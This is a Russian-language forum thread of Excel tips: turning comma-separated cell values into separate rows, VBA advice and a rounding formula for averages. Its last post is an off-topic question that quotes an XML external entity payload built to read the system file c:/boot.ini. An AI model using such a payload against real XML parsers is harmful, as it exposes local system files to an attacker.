Вопрос по Excel

Даже если не скрипт, то хотя бы какой-то полу-автоматический способ.

Два столбца нужно залить в бд prestashop. Быть может есть программы импорта в mysql, настройки которых могут помочь это реализовть !?
 
разбить на столбцы потом скопировать строку и вставить данные в виде столбца на др листе и аналогично со второй строкой
 
сначала выделяешь, потом копировать , ставишь курсор правую кнопку мыши - специальная вставка - трансформация .
 
Hello.


Есть две строки в следующем формате:

1 | 10, 11, 12
2 | 20, 21, 22

Нужно трансформировать это в:

1 | 10
1 | 11
1 | 12
2 | 20
2 | 21
2 | 22
Могу предложить решение на VBA, все довольно просто.
Но у меня вопрос, что значит "|", это значить что 1 находится в одной ячеке, а 10, 11, 12 в другой ячейке?
И всегда ли задача для двух строк?
 
Я подобную задачу решаю так
1) копирую 2-й столбец в текстовый редактор типа AkelPad и заменяю разделитель (у вас зпт+ пробел либо точка с запятой) на таб
2) копирую полученное обратно в таблицу, и создаю массив сцепляя 1-й столбец, с вставленными из текстового редактора
3) полученный массив копирую в текстовый редактор, и делаю замену табов на перевод каретки, копируем обратно в excel, вуа ля
 
На самом деле это не единожды мне нужно.
Вот небольшая статья о том, как написать VBA код в екселе, что бы он выполняясь, делал нужные вам действия.
Скрытое содержимое доступно для зарегистрированных пользователей!

в ссылке убери пробелы вокруг точек и слешей. Пробелы поставил, что бы ссылка не была явной ссылкой, дабы админ не обиделся.
Ссылку нагуглил. Что и вам рекомендую в дальнейшем делать.

Написав, код перебора ячеек по координатам, можно сделать их запись в нужное вам место.
Например с одной страницы читаем данные, а в вторую записываем.

Там прилагается так же файл с примерами, скачай, открой и подправь под свои нужды.
Удачи.
 
Последнее редактирование модератором:
Подскажите пожалуйста, как вывести среднее арифметическое значение в excel и потом привести его к ровному значение из дробного?
 
Самой простой способ:
Copy.
Word:New Blanc document
Paste Special: Unformated Text
Replace: Search: ^t
Replace to:^p
Select All
Copy

Excell:
Paste Special: Unformated Text
 
Подскажите пожалуйста, как вывести среднее арифметическое значение в excel и потом привести его к ровному значение из дробного?
=roundup(sum(A1:A100)/COUNT(A1:A100);0)
где A1:A100 - ваша област
 
Q: как называеться данный тип уязвимостей?
<!DOCTYPE coru [
<!ELEMENT coru ANY >
<!ENTITY xs SYSTEM "file://c:/boot.ini" >]
<coru>&xs;</coru>

Сори за оффтоп помогите пожалуйста.
 
Назад
Сверху